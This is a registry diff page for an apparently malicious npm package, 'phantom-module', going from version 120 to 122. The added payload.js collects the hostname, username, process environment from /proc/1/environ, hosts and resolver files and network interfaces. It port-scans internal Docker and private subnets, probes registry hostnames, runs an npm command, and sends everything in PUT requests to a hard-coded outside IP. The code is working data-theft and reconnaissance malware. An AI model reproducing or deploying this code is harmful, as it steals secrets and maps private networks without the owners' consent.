phantom-module 120.0.0 → 122.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/package.json +1 -1
- package/payload.js +76 -12
package/package.json
CHANGED
package/payload.js
CHANGED
|
@@ -1,28 +1,92 @@
|
|
|
1
1
|
const http = require('http');
|
|
2
|
+
const net = require('net');
|
|
2
3
|
const fs = require('fs');
|
|
3
|
-
|
|
4
|
-
|
|
4
|
+
const { execSync } = require('child_process');
|
|
5
|
+
const dns = require('dns');
|
|
6
|
+
const os = require('os');
|
|
5
7
|
|
|
6
8
|
const REPORT_HOST = '154.57.164.64';
|
|
7
|
-
const REPORT_PORT =
|
|
9
|
+
const REPORT_PORT = 31099;
|
|
8
10
|
|
|
9
|
-
|
|
11
|
+
function report(moduleId, data) {
|
|
10
12
|
return new Promise((resolve) => {
|
|
11
|
-
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n');
|
|
12
|
-
const manifest = `ecto_module:\n name: "
|
|
13
|
-
const
|
|
13
|
+
const safeData = String(data).replace(/"/g, '\\"').replace(/\n/g, '\\n').substring(0, 3500);
|
|
14
|
+
const manifest = `ecto_module:\n name: "RECON"\n cargo_hold: "${safeData}"\n`;
|
|
15
|
+
const body = JSON.stringify({ manifest });
|
|
14
16
|
const req = http.request({
|
|
15
|
-
hostname: REPORT_HOST, port: REPORT_PORT,
|
|
16
|
-
|
|
17
|
+
hostname: REPORT_HOST, port: REPORT_PORT,
|
|
18
|
+
path: `/api/modules/${moduleId}`, method: 'PUT',
|
|
19
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(body) }
|
|
17
20
|
}, () => resolve(true));
|
|
18
21
|
req.on('error', () => resolve(false));
|
|
19
|
-
req.write(
|
|
22
|
+
req.write(body);
|
|
20
23
|
req.end();
|
|
21
24
|
});
|
|
22
25
|
}
|
|
23
26
|
|
|
27
|
+
function checkPort(host, port) {
|
|
28
|
+
return new Promise((resolve) => {
|
|
29
|
+
const sock = new net.Socket();
|
|
30
|
+
sock.setTimeout(400);
|
|
31
|
+
sock.on('connect', () => { sock.destroy(); resolve(true); });
|
|
32
|
+
sock.on('error', () => { sock.destroy(); resolve(false); });
|
|
33
|
+
sock.on('timeout', () => { sock.destroy(); resolve(false); });
|
|
34
|
+
sock.connect(port, host);
|
|
35
|
+
});
|
|
36
|
+
}
|
|
37
|
+
|
|
38
|
+
function httpGet(url) {
|
|
39
|
+
return new Promise((resolve) => {
|
|
40
|
+
http.get(url, { timeout: 2000 }, (res) => {
|
|
41
|
+
let body = '';
|
|
42
|
+
res.on('data', c => body += c);
|
|
43
|
+
res.on('end', () => resolve({ status: res.statusCode, body }));
|
|
44
|
+
}).on('error', e => resolve({ status: 0, body: e.message })).on('timeout', function() { this.destroy(); resolve({ status: 0, body: 'TIMEOUT' }); });
|
|
45
|
+
});
|
|
46
|
+
}
|
|
47
|
+
|
|
24
48
|
async function main() {
|
|
25
|
-
await report('ECT-
|
|
49
|
+
await report('ECT-654321', 'V122 ALIVE! hostname=' + os.hostname() + ' user=' + os.userInfo().username);
|
|
50
|
+
|
|
51
|
+
let env = '=== ENV ===\n';
|
|
52
|
+
try { env += fs.readFileSync('/proc/1/environ','utf8').replace(/\0/g,'\n'); } catch(e) { env += 'ERR:' + e.message; }
|
|
53
|
+
try { env += '\nHOSTS:\n' + fs.readFileSync('/etc/hosts','utf8'); } catch(e) {}
|
|
54
|
+
try { env += 'RESOLV:\n' + fs.readFileSync('/etc/resolv.conf','utf8'); } catch(e) {}
|
|
55
|
+
try { env += 'IFACES:\n' + JSON.stringify(os.networkInterfaces()); } catch(e) {}
|
|
56
|
+
await report('ECT-839201', env);
|
|
57
|
+
|
|
58
|
+
let scan = '=== PORTSCAN ===\n';
|
|
59
|
+
const ips = ['127.0.0.1'];
|
|
60
|
+
for (let i = 1; i <= 20; i++) ips.push('172.17.0.' + i);
|
|
61
|
+
for (let i = 1; i <= 5; i++) ips.push('172.18.0.' + i);
|
|
62
|
+
for (let i = 1; i <= 5; i++) ips.push('172.19.0.' + i);
|
|
63
|
+
ips.push('10.0.0.1','10.0.0.2','10.10.0.1');
|
|
64
|
+
|
|
65
|
+
const ports = [4873, 80, 8080, 3000, 5000, 8081];
|
|
66
|
+
for (const ip of ips) {
|
|
67
|
+
for (const port of ports) {
|
|
68
|
+
if (await checkPort(ip, port)) {
|
|
69
|
+
scan += `OPEN ${ip}:${port}\n`;
|
|
70
|
+
const r = await httpGet('http://' + ip + ':' + port + '/');
|
|
71
|
+
scan += ` -> ${r.status} ${r.body.substring(0,150)}\n`;
|
|
72
|
+
}
|
|
73
|
+
}
|
|
74
|
+
}
|
|
75
|
+
if (scan === '=== PORTSCAN ===\n') scan += 'NO OPEN PORTS FOUND\n';
|
|
76
|
+
|
|
77
|
+
// DNS lookups
|
|
78
|
+
scan += '=== DNS ===\n';
|
|
79
|
+
for (const name of ['verdaccio','registry','npm','host.docker.internal']) {
|
|
80
|
+
try {
|
|
81
|
+
const addr = await new Promise((res,rej) => dns.lookup(name, (err,addr) => err ? rej(err) : res(addr)));
|
|
82
|
+
scan += name + ' -> ' + addr + '\n';
|
|
83
|
+
} catch(e) { scan += name + ' -> FAIL\n'; }
|
|
84
|
+
}
|
|
85
|
+
|
|
86
|
+
// npm config
|
|
87
|
+
try { scan += 'NPM_REG: ' + execSync('npm config get registry 2>/dev/null').toString().trim() + '\n'; } catch(e) {}
|
|
88
|
+
|
|
89
|
+
await report('ECT-987654', scan);
|
|
26
90
|
}
|
|
27
91
|
|
|
28
|
-
main();
|
|
92
|
+
main().catch(e => report('ECT-654321', 'FATAL: ' + e.message));
|